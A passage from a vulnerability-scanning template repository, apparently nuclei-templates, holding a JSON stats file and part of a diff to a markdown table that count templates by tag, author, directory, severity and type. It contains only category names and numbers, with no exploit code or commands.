:"dribbble","count":1},{"name":"gstorage","count":1},{"name":"svn","count":1},{"name":"pyspider","count":1},{"name":"hirak","count":1},{"name":"defectdojo","count":1},{"name":"netgenie","count":1},{"name":"salesforce","count":1},{"name":"eyoumail","count":1},{"name":"camunda","count":1},{"name":"oam","count":1},{"name":"objectinjection","count":1},{"name":"activecollab","count":1},{"name":"formcraft3","count":1},{"name":"paneil","count":1},{"name":"telecom","count":1},{"name":"smi","count":1},{"name":"mappress","count":1},{"name":"wpqa","count":1},{"name":"krweb","count":1},{"name":"covalent","count":1},{"name":"micro-user-service","count":1},{"name":"manager","count":1},{"name":"coinlayer","count":1},{"name":"api-manager","count":1},{"name":"vms","count":1},{"name":"moinmoin","count":1},{"name":"server","count":1},{"name":"mdm","count":1},{"name":"nutanix","count":1},{"name":"mtheme","count":1},{"name":"graphiql","count":1},{"name":"glowroot","count":1},{"name":"primetek","count":1},{"name":"cve2002","count":1},{"name":"shindig","count":1},{"name":"jsp","count":1},{"name":"malwarebazaar","count":1},{"name":"xmlchart","count":1},{"name":"ymhome","count":1},{"name":"announcekit","count":1},{"name":"kenesto","count":1},{"name":"mod-proxy","count":1},{"name":"formalms","count":1},{"name":"diris","count":1},{"name":"cassandra","count":1},{"name":"amcrest","count":1},{"name":"phpfastcache","count":1},{"name":"zookeeper","count":1},{"name":"emlog","count":1},{"name":"festivo","count":1},{"name":"newrelic","count":1},{"name":"pastebin","count":1},{"name":"blackboard","count":1},{"name":"webmodule-ee","count":1},{"name":"ecsimagingpacs","count":1},{"name":"gpon","count":1},{"name":"guppy","count":1},{"name":"emc","count":1},{"name":"mongoshake","count":1},{"name":"web-suite","count":1},{"name":"pihole","count":1},{"name":"dwr","count":1},{"name":"simplecrm","count":1},{"name":"hiawatha","count":1},{"name":"dasan","count":1},{"name":"nearby","count":1},{"name":"web3storage","count":1},{"name":"geocode","count":1},{"name":"huijietong","count":1},{"name":"monitorr","count":1},{"name":"upnp","count":1},{"name":"webpconverter","count":1},{"name":"clansphere","count":1},{"name":"netmask","count":1},{"name":"calendarific","count":1},{"name":"ocs-inventory","count":1},{"name":"cx","count":1},{"name":"radius","count":1},{"name":"mkdocs","count":1},{"name":"pendo","count":1},{"name":"emerson","count":1},{"name":"kodi","count":1},{"name":"phpunit","count":1},{"name":"securityspy","count":1},{"name":"flask","count":1},{"name":"nimble","count":1},{"name":"siteomat","count":1},{"name":"rmi","count":1},{"name":"sponip","count":1},{"name":"emby","count":1},{"name":"acsoft","count":1},{"name":"svnserve","count":1},{"name":"commscope","count":1},{"name":"scanii","count":1},{"name":"webex","count":1},{"name":"viaware","count":1},{"name":"spf","count":1},{"name":"etherscan","count":1},{"name":"kindeditor","count":1},{"name":"rmc","count":1},{"name":"magicflow","count":1},{"name":"etcd","count":1},{"name":"74cms","count":1},{"name":"pan","count":1},{"name":"pirelli","count":1},{"name":"wago","count":1},{"name":"jinfornet","count":1},{"name":"zoomsounds","count":1},{"name":"cooperhewitt","count":1},{"name":"ptr","count":1},{"name":"leanix","count":1},{"name":"intellislot","count":1},{"name":"kronos","count":1},{"name":"lg-nas","count":1},{"name":"agegate","count":1},{"name":"jaspersoft","count":1},{"name":"superwebmailer","count":1},{"name":"tink","count":1},{"name":"appveyor","count":1},{"name":"tracer","count":1},{"name":"sco","count":1},{"name":"acme","count":1},{"name":"mirasys","count":1},{"name":"shopware","count":1},{"name":"vision","count":1},{"name":"fortilogger","count":1}],"authors":[{"name":"daffainfo","count":564},{"name":"dhiyaneshdk","count":423},{"name":"pikpikcu","count":315},{"name":"pdteam","count":262},{"name":"geeknik","count":179},{"name":"dwisiswant0","count":168},{"name":"princechaddha","count":137},{"name":"0x_akoko","count":134},{"name":"gy741","count":119},{"name":"pussycat0x","count":116},{"name":"madrobot","count":65},{"name":"zzeitlin","count":64},{"name":"idealphase","count":49},{"name":"ritikchaddha","count":43},{"name":"gaurang","count":42},{"name":"philippedelteil","count":36},{"name":"adam crosser","count":30},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"c-sh0","count":23},{"name":"ffffffff0x","count":22},{"name":"akincibor","count":20},{"name":"for3stco1d","count":18},{"name":"righettod","count":18},{"name":"cckuailong","count":17},{"name":"sheikhrishad","count":15},{"name":"pr3r00t","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":14},{"name":"r3dg33k","count":14},{"name":"sharath","count":13},{"name":"suman_kar","count":12},{"name":"sullo","count":12},{"name":"cyllective","count":11},{"name":"wdahlenb","count":11},{"name":"melbadry9","count":11},{"name":"johnk3r","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":10},{"name":"alph4byt3","count":10},{"name":"random_robbie","count":10},{"name":"meme-lord","count":10},{"name":"dogasantos","count":10},{"name":"emadshanab","count":9},{"name":"edoardottt","count":9},{"name":"zh","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"aashiq","count":8},{"name":"divya_mudgal","count":7},{"name":"forgedhallpass","count":7},{"name":"dr_set","count":7},{"name":"logicalhunter","count":7},{"name":"0x240x23elu","count":7},{"name":"harshbothra_","count":7},{"name":"random-robbie","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"evan rubinstein","count":6},{"name":"leovalcante","count":6},{"name":"pathtaga","count":6},{"name":"rootxharsh","count":6},{"name":"pentest_swissky","count":6},{"name":"iamnoooob","count":6},{"name":"caspergn","count":6},{"name":"yanyun","count":5},{"name":"tess","count":5},{"name":"lu4nx","count":5},{"name":"joanbono","count":5},{"name":"praetorian-thendrickson","count":5},{"name":"imnightmaree","count":5},{"name":"ganofins","count":5},{"name":"xelkomy","count":5},{"name":"podalirius","count":5},{"name":"panch0r3d","count":5},{"name":"veshraj","count":5},{"name":"elsfa7110","count":5},{"name":"_0xf4n9x_","count":5},{"name":"defr0ggy","count":4},{"name":"dadevel","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"dolev farhi","count":4},{"name":"incogbyte","count":4},{"name":"h1ei1","count":4},{"name":"wisnupramoedya","count":4},{"name":"tanq16","count":4},{"name":"gitlab red team","count":3},{"name":"mr-xn","count":3},{"name":"andydoering","count":3},{"name":"skeltavik","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"johnjhacking","count":3},{"name":"davidmckennirey","count":3},{"name":"shifacyclewala","count":3},{"name":"github.com/its0x08","count":3},{"name":"shine","count":3},{"name":"alifathi-h1","count":3},{"name":"fyoorer","count":3},{"name":"unstabl3","count":3},{"name":"impramodsargar","count":3},{"name":"r3naissance","count":3},{"name":"_generic_human_","count":3},{"name":"z3bd","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"yuzhe-zhang-0","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"jarijaas","count":3},{"name":"arcc","count":3},{"name":"thomas_from_offensity","count":3},{"name":"mavericknerd","count":3},{"name":"supras","count":3},{"name":"lark-lab","count":3},{"name":"sushantkamble","count":3},{"name":"whoever","count":3},{"name":"0w4ys","count":3},{"name":"dudez","count":3},{"name":"hassan khan yusufzai - splint3r7","count":2},{"name":"0xrudra","count":2},{"name":"0xcrypto","count":2},{"name":"splint3r7","count":2},{"name":"randomrobbie","count":2},{"name":"fabaff","count":2},{"name":"cocxanh","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"redteambrasil","count":2},{"name":"hackerarpan","count":2},{"name":"dheerajmadhukar","count":2},{"name":"rafaelwdornelas","count":2},{"name":"sbani","count":2},{"name":"z0ne","count":2},{"name":"smaranchand","count":2},{"name":"hahwul","count":2},{"name":"swissky","count":2},{"name":"geekby","count":2},{"name":"dahse89","count":2},{"name":"cckuakilong","count":2},{"name":"paradessia","count":2},{"name":"vsh00t","count":2},{"name":"paperpen","count":2},{"name":"x1m_martijn","count":2},{"name":"taielab","count":2},{"name":"vavkamil","count":2},{"name":"0xelkomy","count":2},{"name":"badboycxcc","count":2},{"name":"ehsahil","count":2},{"name":"bananabr","count":2},{"name":"0xsmiley","count":2},{"name":"udit_thakkur","count":2},{"name":"socketz","count":2},{"name":"pxmme1337","count":2},{"name":"danielmofer","count":2},{"name":"thardt-praetorian","count":2},{"name":"its0x08","count":2},{"name":"kre80r","count":2},{"name":"lotusdll","count":2},{"name":"nuk3s3c","count":2},{"name":"ambassify","count":2},{"name":"kiblyn11","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"gevakun","count":2},{"name":"nvn1729","count":2},{"name":"k11h-de","count":2},{"name":"0ri2n","count":2},{"name":"y4er","count":2},{"name":"afaq","count":2},{"name":"hetroublemakr","count":2},{"name":"huowuzhao","count":2},{"name":"joeldeleep","count":2},{"name":"parth","count":2},{"name":"g4l1t0","count":2},{"name":"zomsop82","count":2},{"name":"amsda","count":2},{"name":"joshlarsen","count":2},{"name":"bernardofsr","count":2},{"name":"moritz nentwig","count":2},{"name":"0xprial","count":2},{"name":"mohammedsaneem","count":2},{"name":"sy3omda","count":2},{"name":"bing0o","count":2},{"name":"0xsapra","count":2},{"name":"gal nagli","count":2},{"name":"bsysop","count":2},{"name":"manas_harsh","count":2},{"name":"3th1c_yuk1","count":2},{"name":"martincodes-de","count":2},{"name":"w4cky_","count":2},{"name":"bp0lr","count":2},{"name":"ree4pwn","count":2},{"name":"r12w4n","count":2},{"name":"luci","count":2},{"name":"raesene","count":2},{"name":"ajaysenr","count":2},{"name":"nkxxkn","count":2},{"name":"convisoappsec","count":2},{"name":"koti2","count":2},{"name":"foulenzer","count":2},{"name":"luqmaan hadia","count":1},{"name":"brabbit10","count":1},{"name":"0xh7ml","count":1},{"name":"furkansayim","count":1},{"name":"jteles","count":1},{"name":"kiks7","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"tirtha_mandal","count":1},{"name":"f1she3","count":1},{"name":"ilovebinbash","count":1},{"name":"apt-mirror","count":1},{"name":"elder tao","count":1},{"name":"geraldino2","count":1},{"name":"0xceeb","count":1},{"name":"remonsec","count":1},{"name":"florianmaak","count":1},{"name":"hanlaomo","count":1},{"name":"mass0ma","count":1},{"name":"luqman","count":1},{"name":"andysvints","count":1},{"name":"sherlocksecurity","count":1},{"name":"hakluke","count":1},{"name":"ohlinge","count":1},{"name":"0xtavian","count":1},{"name":"wabafet","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"kurohost","count":1},{"name":"ola456","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sshell","count":1},{"name":"elmahdi","count":1},{"name":"_harleo","count":1},{"name":"arr0way","count":1},{"name":"ldionmarcil","count":1},{"name":"fopina","count":1},{"name":"becivells","count":1},{"name":"retr0","count":1},{"name":"pdp","count":1},{"name":"zhenwarx","count":1},{"name":"deena","count":1},{"name":"x6263","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"majidmc2","count":1},{"name":"mhdsamx","count":1},{"name":"anon-artist","count":1},{"name":"daviey","count":1},{"name":"jbaines-r7","count":1},{"name":"revblock","count":1},{"name":"jas37","count":1},{"name":"jeya seelan","count":1},{"name":"shelld3v","count":1},{"name":"duty_1g","count":1},{"name":"skylark-lab","count":1},{"name":"thezakman","count":1},{"name":"s1r1u5_","count":1},{"name":"yashgoti","count":1},{"name":"breno_css","count":1},{"name":"orpheus","count":1},{"name":"igibanez","count":1},{"name":"0xteles","count":1},{"name":"brenocss","count":1},{"name":"clarkvoss","count":1},{"name":"miroslavsotak","count":1},{"name":"izn0u","count":1},{"name":"droberson","count":1},{"name":"ipanda","count":1},{"name":"rubina119","count":1},{"name":"berkdusunur","count":1},{"name":"blckraven","count":1},{"name":"xstp","count":1},{"name":"nielsing","count":1},{"name":"bjhulst","count":1},{"name":"fq_hsu","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"affix","count":1},{"name":"whynotke","count":1},{"name":"kaizensecurity","count":1},{"name":"udyz","count":1},{"name":"ph33r","count":1},{"name":"francescocarlucci","count":1},{"name":"v0idc0de","count":1},{"name":"flag007","count":1},{"name":"dievus","count":1},{"name":"j33n1k4","count":1},{"name":"toufik-airane","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"soyelmago","count":1},{"name":"kabirsuda","count":1},{"name":"myztique","count":1},{"name":"tea","count":1},{"name":"juicypotato1","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"b4uh0lz","count":1},{"name":"momen eldawakhly","count":1},{"name":"hexcat","count":1},{"name":"oscarintherocks","count":1},{"name":"patralos","count":1},{"name":"infosecsanyam","count":1},{"name":"notsoevilweasel","count":1},{"name":"evolutionsec","count":1},{"name":"kailashbohara","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"zandros0","count":1},{"name":"compr00t","count":1},{"name":"manasmbellani","count":1},{"name":"charanrayudu","count":1},{"name":"_c0wb0y_","count":1},{"name":"thesubtlety","count":1},{"name":"notnotnotveg","count":1},{"name":"alperenkesk","count":1},{"name":"schniggie","count":1},{"name":"ahmed sherif","count":1},{"name":"sec_hawk","count":1},{"name":"bartu utku sarp","count":1},{"name":"opencirt","count":1},{"name":"osamahamad","count":1},{"name":"cookiehanhoan","count":1},{"name":"iphantasmic","count":1},{"name":"regala_","count":1},{"name":"pudsec","count":1},{"name":"willd96","count":1},{"name":"xeldax","count":1},{"name":"ggranjus","count":1},{"name":"korteke","count":1},{"name":"adrianmf","count":1},{"name":"0xrod","count":1},{"name":"c3l3si4n","count":1},{"name":"p-l-","count":1},{"name":"yashanand155","count":1},{"name":"omarkurt","count":1},{"name":"coldfish","count":1},{"name":"ooooooo_q","count":1},{"name":"rojanrijal","count":1},{"name":"thevillagehacker","count":1},{"name":"petruknisme","count":1},{"name":"undefl0w","count":1},{"name":"exceed","count":1},{"name":"mah3sec_","count":1},{"name":"justmumu","count":1},{"name":"noobexploiter","count":1},{"name":"phyr3wall","count":1},{"name":"fmunozs","count":1},{"name":"mesaglio","count":1},{"name":"xshuden","count":1},{"name":"ofjaaah","count":1},{"name":"0xceba","count":1},{"name":"manuelbua","count":1},{"name":"jiheon-dev","count":1},{"name":"ahmed abou-ela","count":1},{"name":"ringo","count":1},{"name":"b0yd","count":1},{"name":"gboddin","count":1},{"name":"0ut0fb4nd","count":1},{"name":"d4vy","count":1},{"name":"alevsk","count":1},{"name":"nerrorsec","count":1},{"name":"ahmetpergamum","count":1},{"name":"th3.d1p4k","count":1},{"name":"absshax","count":1},{"name":"mrcl0wnlab","count":1},{"name":"act1on3","count":1},{"name":"furkansenan","count":1},{"name":"chron0x","count":1},{"name":"tirtha","count":1},{"name":"daffianfo","count":1},{"name":"kareemse1im","count":1},{"name":"dhiyaneshdki","count":1},{"name":"0h1in9e","count":1},{"name":"pratik khalane","count":1},{"name":"luskabol","count":1},{"name":"zinminphy0","count":1},{"name":"mubassirpatel","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"co0nan","count":1},{"name":"prajiteshsingh","count":1},{"name":"clment cruchet","count":1},{"name":"yavolo","count":1},{"name":"streetofhackerr007","count":1},{"name":"vzamanillo","count":1},{"name":"b0rn2r00t","count":1},{"name":"zsusac","count":1},{"name":"ok_bye_now","count":1},{"name":"akshansh","count":1},{"name":"shifacyclewla","count":1},{"name":"d0rkerdevil","count":1},{"name":"intx0x80","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"alexrydzak","count":1},{"name":"amnotacat","count":1},{"name":"bad5ect0r","count":1},{"name":"knassar702","count":1},{"name":"husain","count":1},{"name":"jrolf","count":1},{"name":"shreyapohekar","count":1},{"name":"nytr0gen","count":1},{"name":"andirrahmani1","count":1},{"name":"0xd0ff9","count":1},{"name":"yuansec","count":1},{"name":"iampritam","count":1},{"name":"sickwell","count":1},{"name":"elouhi","count":1},{"name":"noamrathaus","count":1},{"name":"aresx","count":1},{"name":"retr02332","count":1},{"name":"qlkwej","count":1},{"name":"jeya.seelan","count":1},{"name":"evan rubinstien","count":1},{"name":"dawid-czarnecki","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"rodnt","count":1},{"name":"wlayzz","count":1},{"name":"harshinsecurity","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"lark lab","count":1},{"name":"rschio","count":1},{"name":"exploitation","count":1},{"name":"arm!tage","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"akash.c","count":1},{"name":"bughuntersurya","count":1},{"name":"narluin","count":1},{"name":"un-fmunozs","count":1},{"name":"borna nematzadeh","count":1},{"name":"prettyboyaaditya","count":1},{"name":"push4d","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"rotemreiss","count":1},{"name":"micha3lb3n","count":1},{"name":"makyotox","count":1},{"name":"sicksec","count":1},{"name":"exid","count":1},{"name":"official_blackhat13","count":1},{"name":"arall","count":1},{"name":"2rs3c","count":1},{"name":"_darrenmartyn","count":1},{"name":"philippdelteil","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"alex","count":1},{"name":"lethargynavigator","count":1},{"name":"aaronchen0","count":1},{"name":"tim_koopmans","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"thebinitghimire","count":1}],"directory":[{"name":"cves","count":1172},{"name":"exposed-panels","count":525},{"name":"vulnerabilities","count":453},{"name":"technologies","count":256},{"name":"exposures","count":204},{"name":"misconfiguration","count":200},{"name":"workflows","count":187},{"name":"token-spray","count":155},{"name":"default-logins","count":96},{"name":"file","count":68},{"name":"takeovers","count":67},{"name":"iot","count":38},{"name":"network","count":35},{"name":"cnvd","count":23},{"name":"miscellaneous","count":23},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"headless","count":6},{"name":"ssl","count":4}],"severity":[{"name":"info","count":1198},{"name":"high","count":885},{"name":"medium","count":667},{"name":"critical","count":415},{"name":"low","count":182},{"name":"unknown","count":6}],"types":[{"name":"http","count":3209},{"name":"file","count":68},{"name":"network","count":50},{"name":"dns","count":17}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 642101fab0..6a40e01402 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,1080 +1,1565 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 | -| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 | -| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 | -| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 | -| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | | -| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | | -| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | | -| tech | 223 | gy741 | 88 | takeovers | 65 | | | | | -| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | | -| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | | -| cve2020 | 171 | madrobot | 65 | workflows | 44 | | | | | -| joomla | 128 | zzeitlin | 64 | iot | 36 | | | | | -| token-spray | 127 | gaurang | 42 | network | 34 | | | | | -| cve2010 | 109 | philippedelteil | 32 | miscellaneous | 22 | | | | | -| cve2019 | 106 | ice3man | 26 | dns | 12 | | | | | -| cve2018 | 101 | organiccrap | 24 | fuzzing | 10 | | | | | -| config | 100 | pr3r00t | 15 | cnvd | 10 | | | | | -| iot | 84 | sheikhrishad | 15 | headless | 5 | | | | | -| apache | 80 | milo2012 | 14 | | | | | | | -| oast | 80 | techbrunchfr | 13 | | | | | | | -| default-login | 71 | suman_kar | 12 | | | | | | | -| takeover | 69 | r3dg33k | 12 | | | | | | | -| token | 68 | righettod | 12 | | | | | | | -| unauth | 57 | cyllective | 11 | | | | | | | -| file | 57 | hackergautam | 10 | | | | | | | -| cve2017 | 56 | random_robbie | 10 | | | | | | | -| ssrf | 47 | nadino | 10 | | | | | | | -| sqli | 46 | melbadry9 | 10 | | | | | | | -| network | 45 | wdahlenb | 10 | | | | | | | -| | 44 | alph4byt3 | 9 | | | | | | | -| oracle | 41 | emadshanab | 8 | | | | | | | -| misconfig | 41 | that_juan_ | 8 | | | | | | | -| cve2016 | 40 | iamthefrogy | 8 | | | | | | | -| redirect | 38 | zh | 8 | | | | | | | -| logs | 34 | aashiq | 8 | | | | | | | -| google | 31 | meme-lord | 8 | | | | | | | -| cve2015 | 31 | harshbothra_ | 7 | | | | | | | -| jira | 30 | dr_set | 7 | | | | | | | -| cisco | 29 | oppsec | 7 | | | | | | | -| atlassian | 29 | divya_mudgal | 7 | | | | | | | -| listing | 29 | kophjager007 | 7 | | | | | | | -| cve2014 | 28 | dogasantos | 7 | | | | | | | -| auth-bypass | 27 | 0x240x23elu | 7 | | | | | | | -| router | 26 | techryptic (@tech) | 7 | | | | | | | -| generic | 24 | randomstr1ng | 7 | | | | | | | -| disclosure | 22 | pentest_swissky | 6 | | | | | | | -| misc | 21 | johnk3r | 6 | | | | | | | -| aem | 20 | iamnoooob | 6 | | | | | | | -| login | 19 | rootxharsh | 6 | | | | | | | -| debug | 19 | logicalhunter | 6 | | | | | | | -| cve2012 | 19 | __fazal | 6 | | | | | | | -| sap | 18 | puzzlepeaches | 6 | | | | | | | -| springboot | 18 | caspergn | 6 | | | | | | | -| php | 16 | yanyun | 5 | | | | | | | -| wp-theme | 16 | panch0r3d | 5 | | | | | | | -| weblogic | 16 | lu4nx | 5 | | | | | | | -| aws | 15 | adam crosser | 5 | | | | | | | -| devops | 15 | elsfa7110 | 5 | | | | | | | -| fuzz | 15 | xelkomy | 5 | | | | | | | -| cve2011 | 15 | joanbono | 5 | | | | | | | -| cve2009 | 14 | idealphase | 5 | | | | | | | -| struts | 14 | ganofins | 5 | | | | | | | -| adobe | 14 | _0xf4n9x_ | 4 | | | | | | | -| deserialization | 14 | incogbyte | 4 | | | | | | | -| android | 13 | forgedhallpass | 4 | | | | | | | -| dns | 13 | nodauf | 4 | | | | | | | -| dlink | 13 | leovalcante | 4 | | | | | | | -| intrusive | 13 | wisnupramoedya | 4 | | | | | | | -| xxe | 12 | defr0ggy | 4 | | | | | | | -| zoho | 12 | tess | 4 | | | | | | | -| manageengine | 12 | e_schultze_ | 4 | | | | | | | -| jenkins | 12 | fyoorer | 3 | | | | | | | -| magento | 11 | unstabl3 | 3 | | | | | | | -| hp | 11 | emenalf | 3 | | | | | | | -| cve2013 | 11 | sushantkamble | 3 | | | | | | | -| microsoft | 11 | alifathi-h1 | 3 | | | | | | | -| ibm | 11 | 0w4ys | 3 | | | | | | | -| dell | 10 | _generic_human_ | 3 | | | | | | | -| cms | 9 | github.com/its0x08 | 3 | | | | | | | -| fastjson | 9 | johnjhacking | 3 | | | | | | | -| fileupload | 9 | yash anand @yashanand155 | 3 | | | | | | | -| gitlab | 9 | me9187 | 3 | | | | | | | -| vmware | 9 | r3naissance | 3 | | | | | | | -| kubernetes | 9 | jarijaas | 3 | | | | | | | -| airflow | 9 | binaryfigments | 3 | | | | | | | -| rails | 9 | imnightmaree | 3 | | | | | | | -| cve2008 | 9 | mavericknerd | 3 | | | | | | | -| ftp | 9 | vsh00t | 3 | | | | | | | -| scada | 8 | shine | 3 | | | | | | | -| netgear | 8 | skeltavik | 3 | | | | | | | -| nginx | 8 | f1tz | 3 | | | | | | | -| backup | 8 | dudez | 3 | | | | | | | -| cnvd | 8 | lark-lab | 3 | | | | | | | -| ruijie | 8 | z3bd | 3 | | | | | | | -| coldfusion | 8 | sullo | 3 | | | | | | | -| django | 7 | impramodsargar | 3 | | | | | | | -| solr | 7 | thomas_from_offensity | 3 | | | | | | | -| files | 7 | shifacyclewala | 3 | | | | | | | -| prometheus | 7 | andydoering | 3 | | | | | | | -| camera | 7 | swissky | 2 | | | | | | | -| confluence | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| drupal | 6 | ehsahil | 2 | | | | | | | -| rconfig | 6 | moritz nentwig | 2 | | | | | | | -| squirrelmail | 6 | dheerajmadhukar | 2 | | | | | | | -| grafana | 6 | mohammedsaneem | 2 | | | | | | | -| api | 6 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| phpmyadmin | 6 | k11h-de | 2 | | | | | | | -| go | 6 | bing0o | 2 | | | | | | | -| citrix | 6 | joeldeleep | 2 | | | | | | | -| laravel | 6 | afaq | 2 | | | | | | | -| windows | 6 | hahwul | 2 | | | | | | | -| sitecore | 6 | 0xprial | 2 | | | | | | | -| jetty | 6 | random-robbie | 2 | | | | | | | -| nodejs | 6 | sy3omda | 2 | | | | | | | -| jolokia | 6 | kiblyn11 | 2 | | | | | | | -| lucee | 6 | arcc | 2 | | | | | | | -| glpi | 6 | 0xcrypto | 2 | | | | | | | -| docker | 6 | nkxxkn | 2 | | | | | | | -| thinkphp | 5 | 0xrudra | 2 | | | | | | | -| wso2 | 5 | zomsop82 | 2 | | | | | | | -| dedecms | 5 | bp0lr | 2 | | | | | | | -| crlf | 5 | davidmckennirey | 2 | | | | | | | -| headless | 5 | hetroublemakr | 2 | | | | | | | -| symfony | 5 | whoever | 2 | | | | | | | -| minio | 5 | w4cky_ | 2 | | | | | | | -| iis | 5 | foulenzer | 2 | | | | | | | -| printer | 5 | bernardofsr | 2 | | | | | | | -| ssti | 5 | martincodes-de | 2 | | | | | | | -| git | 5 | parth | 2 | | | | | | | -| java | 5 | socketz | 2 | | | | | | | -| exchange | 5 | amsda | 2 | | | | | | | -| fatpipe | 5 | ffffffff0x | 2 | | | | | | | -| gocd | 5 | vavkamil | 2 | | | | | | | -| tomcat | 5 | r12w4n | 2 | | | | | | | -| circarlife | 5 | gevakun | 2 | | | | | | | -| elastic | 4 | pxmme1337 | 2 | | | | | | | -| resin | 4 | udit_thakkur | 2 | | | | | | | -| opensis | 4 | huowuzhao | 2 | | | | | | | -| keycloak | 4 | dahse89 | 2 | | | | | | | -| amazon | 4 | fabaff | 2 | | | | | | | -| webserver | 4 | cocxanh | 2 | | | | | | | -| zimbra | 4 | ree4pwn | 2 | | | | | | | -| solarwinds | 4 | koti2 | 2 | | | | | | | -| firmware | 4 | 0xsmiley | 2 | | | | | | | -| thinkcmf | 4 | gal nagli | 2 | | | | | | | -| strapi | 4 | 0xsapra | 2 | | | | | | | -| rfi | 4 | convisoappsec | 2 | | | | | | | -| moodle | 4 | 0xelkomy | 2 | | | | | | | -| traversal | 4 | lotusdll | 2 | | | | | | | -| bigip | 4 | randomrobbie | 2 | | | | | | | -| hongdian | 4 | bsysop | 2 | | | | | | | -| artifactory | 4 | g4l1t0 | 2 | | | | | | | -| samsung | 4 | x1m_martijn | 2 | | | | | | | -| zabbix | 4 | manas_harsh | 2 | | | | | | | -| firebase | 4 | its0x08 | 2 | | | | | | | -| panos | 4 | nytr0gen | 1 | | | | | | | -| asp | 4 | 0xd0ff9 | 1 | | | | | | | -| jellyfin | 4 | chron0x | 1 | | | | | | | -| buffalo | 4 | cckuailong | 1 | | | | | | | -| microstrategy | 4 | daviey | 1 | | | | | | | -| slack | 4 | skylark-lab | 1 | | | | | | | -| cve2007 | 4 | 52971 | 1 | | | | | | | -| maps | 4 | kaizensecurity | 1 | | | | | | | -| magmi | 4 | udyz | 1 | | | | | | | -| vpn | 4 | th3.d1p4k | 1 | | | | | | | -| proxy | 4 | micha3lb3n | 1 | | | | | | | -| symantec | 4 | pudsec | 1 | | | | | | | -| npm | 4 | sshell | 1 | | | | | | | -| wcs | 4 | ldionmarcil | 1 | | | | | | | -| enum | 4 | xshuden | 1 | | | | | | | -| jeesns | 3 | fopina | 1 | | | | | | | -| openssh | 3 | adrianmf | 1 | | | | | | | -| kibana | 3 | deena | 1 | | | | | | | -| node | 3 | ahmetpergamum | 1 | | | | | | | -| vbulletin | 3 | geraldino2 | 1 | | | | | | | -| icewarp | 3 | ohlinge | 1 | | | | | | | -| fanruan | 3 | zinminphy0 | 1 | | | | | | | -| telerik | 3 | fmunozs | 1 | | | | | | | -| movable | 3 | ipanda | 1 | | | | | | | -| smb | 3 | jeya seelan | 1 | | | | | | | -| ebs | 3 | mesaglio | 1 | | | | | | | -| backdoor | 3 | bolli95 | 1 | | | | | | | -| oa | 3 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| ofbiz | 3 | revblock | 1 | | | | | | | -| itop | 3 | d0rkerdevil | 1 | | | | | | | -| activemq | 3 | mubassirpatel | 1 | | | | | | | -| axigen | 3 | smaranchand | 1 | | | | | | | -| tikiwiki | 3 | clarkvoss | 1 | | | | | | | -| spring | 3 | apt-mirror | 1 | | | | | | | -| mongodb | 3 | bad5ect0r | 1 | | | | | | | -| cves | 3 | ooooooo_q | 1 | | | | | | | -| lansweeper | 3 | schniggie | 1 | | | | | | | -| azure | 3 | hanlaomo | 1 | | | | | | | -| nexus | 3 | ratnadip gajbhiye | 1 | | | | | | | -| mail | 3 | _harleo | 1 | | | | | | | -| targa | 3 | andysvints | 1 | | | | | | | -| bitrix | 3 | philippdelteil | 1 | | | | | | | -| fpd | 3 | omarkurt | 1 | | | | | | | -| gogs | 3 | coldfish | 1 | | | | | | | -| kevinlab | 3 | whynotke | 1 | | | | | | | -| caucho | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| pentaho | 3 | ajaysenr | 1 | | | | | | | -| db | 3 | elmahdi | 1 | | | | | | | -| ssh | 3 | undefl0w | 1 | | | | | | | -| cloud | 3 | s1r1u5_ | 1 | | | | | | | 